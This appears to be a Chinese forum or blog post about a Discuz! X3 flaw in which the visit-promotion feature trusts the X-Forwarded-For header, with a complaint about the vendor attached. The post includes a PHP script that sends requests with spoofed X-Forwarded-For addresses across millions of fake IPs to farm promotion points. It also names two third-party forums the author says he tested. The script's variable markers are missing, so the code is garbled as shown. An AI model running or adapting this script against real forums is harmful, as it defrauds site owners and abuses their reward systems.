最近逛白帽社区的discuz版块找找有啥新漏洞可以利用的，发现今年9月份的访问推广漏洞厂商竟然直接无视掉了，果然康盛自从被TX收购之后就越来越没节操了，产品研发周期感觉太短了不说，客服处理问题的效率实在有点低，就比如之前我提交的一个dz的插件出了点小问题，联系了好几天才联系上客服(￣▽￣;) 特别是X3啊，匆匆发布，刚发布的时候各种兼容性问题，BUG层出不穷，漏洞也一大堆，虽然现在升了X3.1……

<?php  
function inj(ip)  {optionget = stream_context_create(array('http' => array('method' => 'GET','ignore_errors'=>true, 'header' => 'X_FORWARDED_FOR: ip')));url = 'http://www.xxx.com/forum.php?fromuid=3007';  
contents = file_get_contents(url,false,optionget);  
returncontents;  
}  
for(i=0;i<255;i++)for(j=0;j<255;j++)for(k=0;k<255;k++)inj('111.i.j.k');  
?>

经测试，所有X3版本的DZ全部中枪，只要开启了访问推广功能就可以刷分，不过还是要取决于后台设置的访问次数限制。 随便找了两个X3的来测试：http://bbs.zerodm.net 和 http://www.xieexx.com/ 均中枪 _(:3」∠)_

以下是原文引用

当X_FORWARDED_FOR头存在并且不为那几种情况时使用这个作为IP地址 因为推广积分是跟访问IP有关的，所以只要修改X_FORWARDED_FOR就可以任意刷积分了

———————————————————————————— 转自乌云